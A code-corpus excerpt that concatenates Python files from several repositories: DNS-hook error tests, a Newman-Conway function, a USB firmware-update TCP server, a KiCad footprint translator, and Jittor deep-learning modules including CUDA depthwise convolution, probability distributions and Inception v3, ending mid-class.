assert hook_under_test in error.message
class TestPostCommandError(object):
def test___str___includes_parent_message(self, mocker):
stub_message = mocker.PropertyMock(
return_value='stub-message')
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-error-message', output=None)
mocker.patch(
'lets_do_dns.errors.HookError.message', new=stub_message)
error = PostCommandError(stub_subprocess_exception)
assert 'stub-message' in error.__str__()
def test___str___includes_command_output_when_present(self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output='stub-output')
error = PostCommandError(stub_subprocess_exception)
assert 'stub-output' in error.__str__()
def test___str___does_not_include_command_output_when_absent(
self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output=None)
error = PostCommandError(stub_subprocess_exception)
assert 'None' not in error.__str__()
def test___str___prepends_output_text_lines_with_four_spaces(
self, mocker):
stub_subprocess_exception = mocker.MagicMock(
spec=CalledProcessError,
__str__=lambda _: 'stub-message', output='line 1\nline 2')
error = PostCommandError(stub_subprocess_exception)
assert '\n line 1\n line 2' in error.__str__()
``` |
{
"source": "jittania/dynamic-programming",
"score": 4
} |
#### File: dynamic-programming/lib/newman_conway.py
```python
def newman_conway(num):
""" Returns a list of the Newman Conway numbers for the given value.
Time Complexity: O(n)
Space Complexity: O(n)
"""
# Base cases: num is 0 or 1
if num == 0:
raise ValueError
if num == 1:
return '1'
# P(1) = 1; P(2) = 1, P(3) = 2
nc_seq_nums = [0, 1, 1]
# The returned list has to be a string:
nc_seq_str = "1 1 "
for i in range(3, num + 1):
# calculating next Newman-Conway sequence value and appending
nc_seq_nums.append(nc_seq_nums[nc_seq_nums[i - 1]] + nc_seq_nums[i - nc_seq_nums[i - 1]])
# must convert to string
nc_seq_str += f"{nc_seq_nums[i]} "
return nc_seq_str[:-1]
``` |
{
"source": "JitterCompany/jitter_usb_py",
"score": 3
} |
#### File: jitter_usb_py/examples/console.py
```python
from PyQt5 import QtWidgets
class ConsoleView(QtWidgets.QWidget):
def __init__(self):
"""
Consoleview combines the terminal and debuglog window
"""
super().__init__()
self.layout = QtWidgets.QHBoxLayout()
self.setLayout(self.layout)
def addView(self, view, label):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel(label)
layout.addWidget(label)
layout.addWidget(view)
self.layout.addLayout(layout)
```
#### File: jitter_usb_py/jitter_usb_py/update_server.py
```python
import threading
import socket
import socketserver
import time
import queue
def list_to_str(l):
ret = ""
for i in l:
ret+= str(i) + ","
if len(ret):
ret = ret[:-1]
return ret
def encode(string):
return bytes(string, 'ascii')
def decode(bytestr):
return str(bytestr, 'ascii')
class FirmwareTask:
def __init__(self, device, fw_files):
""" Init FirmwareTask: fw_files is a {'dst_name': 'src_fname'} dict"""
self._device = device
self._fw_files = fw_files
self._result = None
def execute(self):
""" Perform a firmware update from main/USB thread"""
if not self._device:
print("WARNING: dummy mode!")
self._result = False
return
print("updating device {}: prepare for update".format(
self._device.serial_number))
self._device.stop()
for dst_fname, src_fname in self._fw_files.items():
self._device.upload_file(dst_fname, src_fname,
on_complete=self._on_upload_cb)
self._device.reboot(on_complete=self._on_reboot_cb)
def _on_upload_cb(self, fname):
print("updating device {}: file {} uploaded".format(
self._device.serial_number, fname))
def _on_reboot_cb(self):
print("updating device {}: reboot done!".format(
self._device.serial_number))
self._result =True
def wait(self, timeout_sec=5):
""" Wait untill the task is done, returns False on timeout"""
interval = 0.1
while (timeout_sec > 0) and (self._result is None):
time.sleep(interval)
timeout_sec-= interval
return self._result
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("\n==== Firmware Update Request ====")
devices = [d.serial_number for d in self.server.get_device_list()]
header = "devices=" + list_to_str(devices)
self.request.sendall(encode(header))
data = decode(self.request.recv(1024*1024)).split("\n")
response = self._process_client_command(data)
self.request.sendall(encode(response))
print("=" * 33)
def _process_client_command(self, data):
FILE_PREFIX = 'file:'
# received params
to_update = []
fw_files = {}
# parse commands from client
for line in data:
tokens = line.split('=')
if len(tokens) < 2:
continue
key = tokens[0]
value = line[len(key):].strip('=')
# fw_*[.bin]=<src_filename> uploads <src_filename> as fw_*.bin
if key.startswith('fw_'):
dst_name = key
if not dst_name.endswith('.bin'):
dst_name+= '.bin'
fw_files[dst_name] = value
# file:<src_fname>=<src_fname> uploads <src_fname> as <dst_fname>
elif key.startswith(FILE_PREFIX):
dst_name = key[len(FILE_PREFIX):]
fw_files[dst_name] = value
# update_devices=<csv_devicelist> updates all devices in the list
elif key == 'update_devices':
to_update = [v.strip() for v in value.split(',')]
else:
print("API WARNING: unknown key '{}'".format(key))
updated = []
for dev_id in to_update:
if self._do_firmware_upgrade(dev_id, fw_files):
updated.append(dev_id)
else:
print("updating device {}: fail or timeout".format(dev_id))
response = "updated=" + list_to_str(updated)
return response
def _find_device(self, dev_id):
devices = self.server.get_device_list()
for dev in devices:
if dev.serial_number == dev_id:
return dev
return None
def _do_firmware_upgrade(self, dev_id, fw_files):
dst_names = [dst for dst in fw_files]
print("Update {} {}".format(dev_id, dst_names))
device = self._find_device(dev_id)
if device is None:
return False
task = FirmwareTask(device, fw_files)
self.server.update_tasks.put(task)
return task.wait(timeout_sec=10)
class FirmwareUpdateServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, addr, device_list=[]):
super().__init__(addr, ThreadedTCPRequestHandler)
self._device_list = device_list
self.update_tasks = queue.Queue()
def update_device_list(self, new_device_list):
""" Keep the list of available devices up to date """
print("FirmwareUpdateServer: new device list:",
[dev.serial_number for dev in new_device_list])
self._device_list = new_device_list
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def start(self):
ip, port = self.server_address
server_thread = threading.Thread(target=self.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Firmware Update Server ready at {}:{}".format(ip,port))
def stop(self):
self.shutdown()
self.server_close()
print("Firmware Update Server stopped")
def poll(self):
try:
t = self.update_tasks.get(block=False)
if t:
t.execute()
except queue.Empty:
pass
def get_device_list(self):
return self._device_list
``` |
{
"source": "JitterCompany/Kicad_bom_sync",
"score": 3
} |
#### File: JitterCompany/Kicad_bom_sync/translate_fp.py
```python
import re
def _substr_after(s, delim):
return s.partition(delim)[2]
passive_package_regex = re.compile('(^.*\s+[0-9]+)\s+[0-9]+(M|m)etric$')
def translate_fp(fp_string):
"""
Translate a footprint to a simpler human-readable format
The goal is to make the BOM as clean and readable as possible. Note
that the translated footprints are l
still keeping the footprints unique enough that they can be used to
correctly group parts based on them
"""
if not fp_string:
return ""
if not isinstance(fp_string, str):
fp_string = str(fp_string)
result = fp_string
# Try to remove the library prefix
lib_prefix_removed = _substr_after(fp_string, ':')
if lib_prefix_removed:
result=lib_prefix_removed
# Underscore to space for better readability
result = result.replace('_', ' ').strip()
match = passive_package_regex.match(result)
if match:
result = match.group(1)
return result
``` |
{
"source": "Jittor/Jittor",
"score": 2
} |
#### File: jittor/dataset/utils.py
```python
import jittor as jt
import numpy as np
from collections.abc import Sequence, Mapping
from PIL import Image
import time
def get_random_list(n):
return list(np.random.permutation(range(n)))
def get_order_list(n):
return [i for i in range(n)]
def collate_batch(batch):
r"""Puts each data field into a tensor with outer dimension batch size"""
real_size = len(batch)
elem = batch[0]
elem_type = type(elem)
if isinstance(elem, jt.Var):
temp_data = jt.stack([data for data in batch], 0)
return temp_data
if elem_type is np.ndarray:
temp_data = np.stack([data for data in batch], 0)
return temp_data
elif np.issubdtype(elem_type, np.integer):
return np.int32(batch)
elif isinstance(elem, int):
return np.int32(batch)
elif isinstance(elem, float):
return np.float32(batch)
elif isinstance(elem, str):
return batch
elif isinstance(elem, Mapping):
return {key: collate_batch([d[key] for d in batch]) for key in elem}
elif isinstance(elem, tuple):
transposed = zip(*batch)
return tuple(collate_batch(samples) for samples in transposed)
elif isinstance(elem, Sequence):
transposed = zip(*batch)
return [collate_batch(samples) for samples in transposed]
elif isinstance(elem, Image.Image):
temp_data = np.stack([np.array(data) for data in batch], 0)
return temp_data
else:
raise TypeError(f"Not support type <{elem_type.__name__}>")
class HookTimer:
def __init__(self, obj, attr):
self.origin = getattr(obj, attr)
self.duration = 0.0
setattr(obj, attr, self)
def __call__(self, *args, **kw):
start = time.time()
rt = self.origin(*args, **kw)
self.duration += time.time() - start
return rt
```
#### File: python/jittor/depthwise_conv.py
```python
import jittor as jt
from jittor import init
from jittor import nn
from jittor import Function
class DepthwiseConv(Function):
def __init__(self, stride=1, padding=0, dilation=1):
self.stride = stride if isinstance(stride, tuple) else (stride, stride)
self.padding = padding if isinstance(padding, tuple) else (padding, padding)
self.dilation = dilation if isinstance(dilation, tuple) else (dilation, dilation)
def execute(self, x, weight):
self.save_vars = x, weight
N,C,H,W = x.shape
o,i,Kh,Kw = weight.shape
assert(o == C)
oh = (H+self.padding[0]*2-Kh*self.dilation[0]+self.dilation[0]-1)//self.stride[0]+1
ow = (W+self.padding[1]*2-Kw*self.dilation[1]+self.dilation[1]-1)//self.stride[1]+1
filter_height, filter_width = Kh, Kw
self.Khw = Kh, Kw
assert oh>0 and ow>0
output = jt.code(
[N, C, oh, ow],
x.dtype,
[x, weight],
cuda_header = """
template <typename T,
int filter_height,
int filter_width,
int stride_height,
int stride_width>
__global__ void KernelDepthwiseConv(
const T *const input_data, const T *const filter_data, const int batch_size,
const int output_channels, const int output_height,
const int output_width, const int input_channels,
const int input_height, const int input_width,
const int padding_height, const int padding_width,
const int dilate_height, const int dilate_width, T *const output_data) {
const int kWeghtSize = filter_height * filter_width;
T r_weight[kWeghtSize];
const int batch = blockIdx.y;
const int c_out = blockIdx.x;
const T* weight = filter_data + c_out * filter_height * filter_width;
for (int i = 0; i < filter_height * filter_width; i++) r_weight[i] = weight[i];
for (int w_out = threadIdx.x; w_out < output_width; w_out += blockDim.x) {
for (int h_out = threadIdx.y; h_out < output_height; h_out += blockDim.y) {
const int batch = blockIdx.y;
const int c_out = blockIdx.x;
const int c_in = c_out;
T value = 0;
const int h_in_start = -padding_height + h_out * stride_height;
const int w_in_start = -padding_width + w_out * stride_width;
const int h_in_end = h_in_start + filter_height * dilate_height;
const int w_in_end = w_in_start + filter_width * dilate_width;
const int in_offset =
((batch * input_channels + c_in) * input_height) * input_width;
const int h_end = h_in_end < input_height ? h_in_end : input_height;
const int w_end = w_in_end < input_width ? w_in_end : input_width;
const int h_start = h_in_start > 0 ? h_in_start : 0;
const int w_start = w_in_start > 0 ? w_in_start : 0;
for (int h_in = h_in_start, h_f = 0; h_f < filter_height;
h_in += dilate_height, h_f++) {
for (int w_in = w_in_start, w_f = 0; w_f < filter_width;
w_in += dilate_width, w_f++) {
if (h_in >= 0 && h_in < input_height && w_in >= 0 &&
w_in < input_width) {
const int offset = in_offset + h_in * input_width + w_in;
value += r_weight[h_f * filter_width + w_f] * input_data[offset];
}
}
}
int index =
((batch * gridDim.x + c_out) * output_height + h_out) * output_width +
w_out;
output_data[index] = value;
}
}
}
""",
cuda_src=f"""
@alias(input, in0)
@alias(filter, in1)
@alias(output, out)
const int batch_size = input_shape0;
const int input_channels = input_shape1;
const int input_height = input_shape2;
const int input_width = input_shape3;
const int output_channels = output_shape1;
const int output_height = output_shape2;
const int output_width = output_shape3;
const int ksize_height = {Kh};
const int ksize_width = {Kw};
const int stride_height = {self.stride[0]};
const int stride_width = {self.stride[1]};
const int padding_height = {self.padding[0]};
const int padding_width = {self.padding[1]};
const int dilate_height = {self.dilation[0]};
const int dilate_width = {self.dilation[1]};
int thread = 512;
if (output_width > 1024 && output_width <= 2048)
thread = (output_width - 1) / 2 + 1;
else if (output_width > 512 && output_width <= 1024)
thread = output_width;
int blocks = std::min(std::max(thread / output_width, 1), output_height);
dim3 threads(std::min(output_width, thread), blocks, 1);
dim3 grid(output_channels, batch_size, 1);
KernelDepthwiseConv<
input_type, ksize_height, ksize_width,
stride_height, stride_width>
<<<grid, threads>>>(
input_p, filter_p, batch_size, output_channels, output_height,
output_width, input_channels, input_height, input_width,
padding_height, padding_width, dilate_height,
dilate_width, output_p);
"""
)
return output
def grad(self, grad):
x, weight = self.save_vars
Kh, Kw = self.Khw
return jt.code([x.shape, weight.shape], [x.dtype, weight.dtype], [x, weight, grad],
cuda_header = f"#include <{jt.compile_extern.cub_home}cub/cub.cuh>"+"""
template <typename T>
__device__ __inline__ void CudaAtomicAddWithWarp(T* sum, T value) {
typedef cub::WarpReduce<T> WarpReduce;
typename WarpReduce::TempStorage temp_storage;
value = WarpReduce(temp_storage).Sum(value);
if (cub::LaneId() == 0)
atomicAdd(sum, value);
}
// CUDA kernel to compute the depthwise convolution backprop w.r.t input.
template <typename T,
int filter_height,
int filter_width,
int stride_height,
int stride_width>
__global__ void KernelDepthwiseConvInputGradCFilter(
const T *const input_data, const T *const output_grad_data,
const T *const filter_data, const int batch_size,
const int output_channels, const int output_height,
const int output_width, const int input_channels,
const int input_height, const int input_width,
const int padding_height, const int padding_width,
const int dilate_height, const int dilate_width,
T *const input_grad_data) {
const int kWeghtSize = filter_height * filter_width + 1;
T r_weight[kWeghtSize];
const int batch = blockIdx.y;
const int c_in = blockIdx.x;
const T* weight = filter_data + c_in * filter_height * filter_width;
for (int i = 0; i < filter_height * filter_width; i++)
r_weight[i] =
weight[filter_height * filter_width - i - 1];
for (int w_in = threadIdx.x; w_in < input_width; w_in += blockDim.x) {
for (int h_in = threadIdx.y; h_in < input_height; h_in += blockDim.y) {
const int batch = blockIdx.y;
const int c_in = blockIdx.x;
int h_out_start = h_in - (filter_height - 1) * dilate_height + padding_height;
int w_out_start = w_in - (filter_width - 1) * dilate_width + padding_width;
T value = 0;
int index =
((batch * gridDim.x + c_in) * input_height + h_in) * input_width +
w_in;
for (int h_out = h_out_start, h_f = 0; h_f < filter_height;
h_out += dilate_height, h_f++) {
for (int w_out = w_out_start, w_f = 0; w_f < filter_width;
w_out += dilate_width, w_f++) {
int s_h_out = h_out / stride_height;
int s_w_out = w_out / stride_width;
if (h_out % stride_height == 0 && w_out % stride_width == 0 &&
s_h_out >= 0 && s_h_out < output_height && s_w_out >= 0 &&
s_w_out < output_width) {
const int output_grad_offset =
((batch * output_channels + c_in) * output_height +
s_h_out) *
output_width +
s_w_out;
value +=
output_grad_data[output_grad_offset] *
r_weight[h_f * filter_width + w_f];
}
}
}
input_grad_data[index] = value;
}
}
}
// Cuda kernel to compute the depthwise convolution backprop w.r.t. filter.
template <typename T>
__global__ void KernelDepthwiseConvFilterGrad(
const T* output_grad_data, const T* input_data, const int num,
const int output_channels, const int output_height, const int output_width,
const int input_channels, const int input_height, const int input_width,
const int filter_height,
const int filter_width, const int stride_height, const int stride_width,
const int padding_height, const int padding_width, const int dilate_height,
const int dilate_width, T* filter_grad_data) {
T s = 0;
int gbid = (((blockIdx.z * blockDim.z + threadIdx.z) * gridDim.y) + blockIdx.y) * gridDim.x + blockIdx.x;
for (int image_w = threadIdx.x; image_w < output_width;
image_w += blockDim.x) {
for (int bid = 0; bid < num; bid++) {
//for (int bid = threadIdx.z; bid < num; bid+=blockDim.z) {
for (int image_h = threadIdx.y; image_h < output_height;
image_h += blockDim.y) {
int kernel_id = blockIdx.z;
int kernel_h = blockIdx.y * dilate_height - padding_height;
int kernel_w = blockIdx.x * dilate_width - padding_width;
int image_hk = image_h * stride_height + kernel_h;
int image_wk = image_w * stride_width + kernel_w;
if (image_hk < 0 || image_hk >= input_height) continue;
if (image_wk < 0 || image_wk >= input_width) continue;
#define gaid(N, C, H, W) \
((((N)*gridDim.z + (C)) * output_height + (H)) * output_width + (W))
int input_id = ((bid * gridDim.z +
kernel_id) *
input_height +
image_hk) *
input_width +
image_wk;
s += output_grad_data[gaid(bid, kernel_id, image_h, image_w)] *
input_data[input_id];
#undef gaid
}
}
}
CudaAtomicAddWithWarp(&filter_grad_data[gbid], s);
}
""",
cuda_src=f"""
// source for backward to data
@alias(input, in0)
@alias(filter, in1)
@alias(output_grad, in2)
@alias(input_grad, out0)
@alias(filter_grad, out1)
const int batch_size = input_shape0;
const int input_channels = input_shape1;
const int input_height = input_shape2;
const int input_width = input_shape3;
const int output_channels = output_grad_shape1;
const int output_height = output_grad_shape2;
const int output_width = output_grad_shape3;
const int ksize_height = {Kh};
const int ksize_width = {Kw};
const int stride_height = {self.stride[0]};
const int stride_width = {self.stride[1]};
const int padding_height = {self.padding[0]};
const int padding_width = {self.padding[1]};
const int dilate_height = {self.dilation[0]};
const int dilate_width = {self.dilation[1]};
int thread = 512;
if (input_width > 1024 && input_width <= 2048)
thread = (input_width - 1) / 2 + 1;
else if (input_width > 512 && input_width <= 1024)
thread = input_width;
int blocks = std::min(std::max(thread / input_width, 1), input_height);
dim3 threads(std::min(input_width, thread), blocks, 1);
dim3 grid(input_channels, batch_size, 1);
KernelDepthwiseConvInputGradCFilter<
input_type, ksize_height, ksize_width
, stride_height, stride_width>
<<<grid, threads, 0>>>(
input_p, output_grad_p, filter_p, batch_size,
output_channels, output_height, output_width, input_channels,
input_height, input_width, padding_height,
padding_width, dilate_height, dilate_width, input_grad_p);
// source for backward to filter
int block_size = 512;
if (output_width > 1024 && output_width <= 2048)
block_size = (output_width - 1) / 2 + 1;
else if (output_width > 512 && output_width <= 1024)
block_size = output_width;
int crop_output_height =
std::min(std::max(block_size / output_width, 1), output_height);
grid = dim3(ksize_width, ksize_height, output_channels);
threads = dim3(std::min(output_width, block_size), crop_output_height, 1);
cudaMemsetAsync(filter_grad_p, 0, filter_grad->size);
KernelDepthwiseConvFilterGrad<
input_type><<<grid, threads, 0>>>(
output_grad_p, input_p, batch_size, output_channels,
output_height, output_width, input_channels, input_height,
input_width, ksize_height, ksize_width,
stride_height, stride_width, padding_height, padding_width,
dilate_height, dilate_width, filter_grad_p);
"""
)
```
#### File: python/jittor/distributions.py
```python
import math
import numpy as np
import jittor as jt
from jittor.nn import binary_cross_entropy_with_logits
def simple_presum(x):
src = '''
__inline_static__
@python.jittor.auto_parallel(1)
void kernel(int n0, int i0, in0_type* x, in0_type* out, int nl) {
out[i0*(nl+1)] = 0;
for (int i=0; i<nl; i++)
out[i0*(nl+1)+i+1] = out[i0*(nl+1)+i] + x[i0*nl+i];
}
kernel(in0->num/in0->shape[in0->shape.size()-1], 0, in0_p, out0_p, in0->shape[in0->shape.size()-1]);
'''
return jt.code(x.shape[:-1]+(x.shape[-1]+1,), x.dtype, [x],
cpu_src=src, cuda_src=src)
class OneHotCategorical:
def __init__(self, probs=None, logits=None):
Categorical.__init__(self, probs, logits)
def sample(self, sample_shape=[]):
shape = sample_shape + self.probs.shape[:-1] + (1,)
rand = jt.rand(shape)
one_hot = jt.logical_and(self.cum_probs_l < rand, rand <= self.cum_probs_r).float()
return one_hot
def log_prob(self, x):
x = jt.argmax(x, dim=-1)[0]
return Categorical.log_prob(self, x)
def entropy(self):
p_log_p = self.logits * self.probs
return -p_log_p.sum(-1)
class Categorical:
def __init__(self, probs=None, logits=None):
assert not (probs is None and logits is None)
if probs is None:
# cannot align to pytorch
probs = jt.sigmoid(logits)
probs = probs / probs.sum(-1, True)
if logits is None:
logits = jt.safe_log(probs)
with jt.no_grad():
self.probs = probs
self.logits = logits
self.cum_probs = simple_presum(self.probs)
self.cum_probs_l = self.cum_probs[..., :-1]
self.cum_probs_r = self.cum_probs[..., 1:]
def sample(self, sample_shape=()):
shape = sample_shape + self.probs.shape[:-1] + (1,)
rand = jt.rand(shape)
one_hot = jt.logical_and(self.cum_probs_l < rand, rand <= self.cum_probs_r)
index = one_hot.index(one_hot.ndim - 1)
return (one_hot * index).sum(-1)
def log_prob(self, x):
a = self.probs.ndim
b = x.ndim
indexes = tuple( f'i{i}' for i in range(b-a+1, b) )
indexes = indexes + (x,)
return jt.safe_log(self.probs).getitem(indexes)
def entropy(self):
p_log_p = self.logits * self.probs
return -p_log_p.sum(-1)
class Normal:
def __init__(self, mu, sigma):
self.mu = mu
self.sigma = sigma
def sample(self, sample_shape=None):
return jt.normal(jt.array(self.mu), jt.array(self.sigma),size=sample_shape)
def log_prob(self, x):
var = self.sigma**2
log_scale = jt.safe_log(self.sigma)
return -((x-self.mu)**2) / (2*var) - log_scale-np.log(np.sqrt(2*np.pi))
def entropy(self):
return 0.5+0.5*np.log(2*np.pi)+jt.safe_log(self.sigma)
class Uniform:
def __init__(self,low,high):
self.low = low
self.high = high
assert high > low
def sample(self,sample_shape):
return jt.uniform(self.low,self.high,sample_shape)
def log_prob(self,x):
if x < self.low or x >= self.high:
return math.inf
return -jt.safe_log(self.high - self.low)
def entropy(self):
return jt.safe_log(self.high - self.low)
class Geometric:
def __init__(self,p=None,logits=None):
assert (p is not None) or (logits is not None)
assert 0 < p and p < 1
if p is None:
self.prob = jt.sigmoid(logits)
self.logits = logits
elif logits is None:
self.prob = p
self.logits = -jt.safe_log(1. / p - 1)
def sample(self, sample_shape):
u = jt.rand(sample_shape)
return (jt.safe_log(u) / (jt.safe_log(-self.probs+1))).floor_int()
def log_prob(self, x):
return x*jt.safe_log(-self.prob+1)+jt.safe_log(self.prob)
def entropy(self):
return binary_cross_entropy_with_logits(jt.array(self.logits),jt.array(self.prob)) / self.prob
def kl_divergence(cur_dist, old_dist):
assert isinstance(cur_dist, type(old_dist))
if isinstance(cur_dist, Normal):
vr = (cur_dist.sigma / old_dist.sigma)**2
t1 = ((cur_dist.mu - old_dist.mu) / old_dist.sigma)**2
return 0.5*(vr+t1-1-jt.safe_log(vr))
if isinstance(cur_dist, Categorical) or isinstance(cur_dist,OneHotCategorical):
t = cur_dist.probs * (cur_dist.logits-old_dist.logits)
return t.sum(-1)
if isinstance(cur_dist, Uniform):
res = jt.safe_log((old_dist.high - old_dist.low) / (cur_dist.high - cur_dist.low))
if old_dist.low > cur_dist.low or old_dist.high < cur_dist.high:
res = math.inf
return res
if isinstance(cur_dist, Geometric):
return -cur_dist.entropy() - jt.safe_log(-old_dist.prob+1) / cur_dist.prob - old_dist.logits
```
#### File: extern/acl/acl_compiler.py
```python
import os
from jittor_utils import env_or_try_find
import jittor_utils
import ctypes
import glob
has_acl = 0
cc_flags = ""
tikcc_path = env_or_try_find('tikcc_path', 'tikcc')
dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL
def install():
import jittor.compiler as compiler
global has_acl, cc_flags
acl_compiler_home = os.path.dirname(__file__)
cc_files = sorted(glob.glob(acl_compiler_home+"/**/*.cc", recursive=True))
cc_flags += f" -DHAS_CUDA -DIS_ACL -I/usr/local/Ascend/latest/x86_64-linux/include/ -I/usr/local/Ascend/latest/x86_64-linux/include/acl -L/usr/local/Ascend/latest/x86_64-linux/lib64 -I/usr/local/Ascend/runtime/include -I/usr/local/Ascend/driver/include -L/usr/local/Ascend/compiler/lib64 -L/usr/local/Ascend/runtime/lib64 -I{acl_compiler_home} -ltikc_runtime -lascendcl "
ctypes.CDLL("libascendcl.so", dlopen_flags)
jittor_utils.LOG.i("ACL detected")
mod = jittor_utils.compile_module('''
#include "common.h"
namespace jittor {
// @pyjt(process)
string process_acl(const string& src, const string& name, const map<string,string>& kargs);
}''', compiler.cc_flags + " " + " ".join(cc_files) + cc_flags)
jittor_utils.process_jittor_source("acl", mod.process)
has_acl = 1
def check():
import jittor.compiler as compiler
global has_acl, cc_flags
if tikcc_path:
try:
install()
except Exception as e:
jittor_utils.LOG.w(f"load ACL failed, exception: {e}")
has_acl = 0
compiler.has_acl = has_acl
compiler.tikcc_path = tikcc_path
if not has_acl: return False
compiler.cc_flags += cc_flags
compiler.nvcc_path = tikcc_path
compiler.nvcc_flags = compiler.cc_flags.replace("-std=c++14","")
return True
```
#### File: jittor/models/inception.py
```python
import jittor as jt
from jittor import nn
__all__ = ['Inception3', 'inception_v3']
def inception_v3(pretrained=False, progress=True, **kwargs):
model = Inception3(**kwargs)
if pretrained: model.load("jittorhub://inception_v3.pkl")
return model
class Inception3(nn.Module):
""" Inceptionv3 model architecture.
Args:
* num_classes: Number of classes. Default: 1000.
* aux_logits: If True, add an auxiliary branch that can improve training. Default: True
* inception_blocks: List of seven blocks, [conv_block, inception_a, inception_b, inception_c, inception_d, inception_e, inception_aux]. If None, will use [BasicConv2d, InceptionA, InceptionB, InceptionC, InceptionD, InceptionE, InceptionAux] instead. Default: None.
* init_weights: Defualt: True.
"""
def __init__(self, num_classes=1000, aux_logits=True, inception_blocks=None, init_weights=True):
super(Inception3, self).__init__()
if (inception_blocks is None):
inception_blocks = [BasicConv2d, InceptionA, InceptionB, InceptionC, InceptionD, InceptionE, InceptionAux]
assert (len(inception_blocks) == 7)
conv_block = inception_blocks[0]
inception_a = inception_blocks[1]
inception_b = inception_blocks[2]
inception_c = inception_blocks[3]
inception_d = inception_blocks[4]
inception_e = inception_blocks[5]
inception_aux = inception_blocks[6]
self.aux_logits = aux_logits
self.Conv2d_1a_3x3 = conv_block(3, 32, kernel_size=3, stride=2)
self.Conv2d_2a_3x3 = conv_block(32, 32, kernel_size=3)
self.Conv2d_2b_3x3 = conv_block(32, 64, kernel_size=3, padding=1)
self.Conv2d_3b_1x1 = conv_block(64, 80, kernel_size=1)
self.Conv2d_4a_3x3 = conv_block(80, 192, kernel_size=3)
self.Mixed_5b = inception_a(192, pool_features=32)
self.Mixed_5c = inception_a(256, pool_features=64)
self.Mixed_5d = inception_a(288, pool_features=64)
self.Mixed_6a = inception_b(288)
self.Mixed_6b = inception_c(768, channels_7x7=128)
self.Mixed_6c = inception_c(768, channels_7x7=160)
self.Mixed_6d = inception_c(768, channels_7x7=160)
self.Mixed_6e = inception_c(768, channels_7x7=192)
if aux_logits:
self.AuxLogits = inception_aux(768, num_classes)
self.Mixed_7a = inception_d(768)
self.Mixed_7b = inception_e(1280)
self.Mixed_7c = inception_e(2048)
self.fc = nn.Linear(2048, num_classes)
def _forward(self, x):
x = self.Conv2d_1a_3x3(x)
x = self.Conv2d_2a_3x3(x)
x = self.Conv2d_2b_3x3(x)
x = nn.pool(x, 3, "maximum", stride=2)
x = self.Conv2d_3b_1x1(x)
x = self.Conv2d_4a_3x3(x)
x = nn.pool(x, 3, "maximum", stride=2)
x = self.Mixed_5b(x)
x = self.Mixed_5c(x)
x = self.Mixed_5d(x)
x = self.Mixed_6a(x)
x = self.Mixed_6b(x)
x = self.Mixed_6c(x)
x = self.Mixed_6d(x)
x = self.Mixed_6e(x)
aux_defined = self.aux_logits
if aux_defined:
aux = self.AuxLogits(x)
else:
aux = None
x = self.Mixed_7a(x)
x = self.Mixed_7b(x)
x = self.Mixed_7c(x)
x = nn.AdaptiveAvgPool2d(1)(x)
x = nn.Dropout()(x)
x = jt.reshape(x, (x.shape[0], (- 1)))
x = self.fc(x)
return (x, aux)
def eager_outputs(self, x, aux):
return x
def execute(self, x):
(x, aux) = self._forward(x)
aux_defined = self.aux_logits
return self.eager_outputs(x, aux)
class InceptionA(nn.Module):
def __init__(self, in_channels, pool_features, conv_block=None):
super(InceptionA, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 64, kernel_size=1)
self.branch5x5_1 = conv_block(in_channels, 48, kernel_size=1)
self.branch5x5_2 = conv_block(48, 64, kernel_size=5, padding=2)
self.branch3x3dbl_1 = conv_block(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = conv_block(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = conv_block(96, 96, kernel_size=3, padding=1)
self.branch_pool = conv_block(in_channels, pool_features, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = nn.pool(x, 3, "mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionB(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionB, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch3x3 = conv_block(in_channels, 384, kernel_size=3, stride=2)
self.branch3x3dbl_1 = conv_block(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = conv_block(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = conv_block(96, 96, kernel_size=3, stride=2)
def _forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = nn.pool(x, 3, "maximum", stride=2)
outputs = [branch3x3, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionC(nn.Module):
def __init__(self, in_channels, channels_7x7, conv_block=None):
super(InceptionC, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 192, kernel_size=1)
c7 = channels_7x7
self.branch7x7_1 = conv_block(in_channels, c7, kernel_size=1)
self.branch7x7_2 = conv_block(c7, c7, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7_3 = conv_block(c7, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_1 = conv_block(in_channels, c7, kernel_size=1)
self.branch7x7dbl_2 = conv_block(c7, c7, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_3 = conv_block(c7, c7, kernel_size=(1, 7), padding=(0, 3))
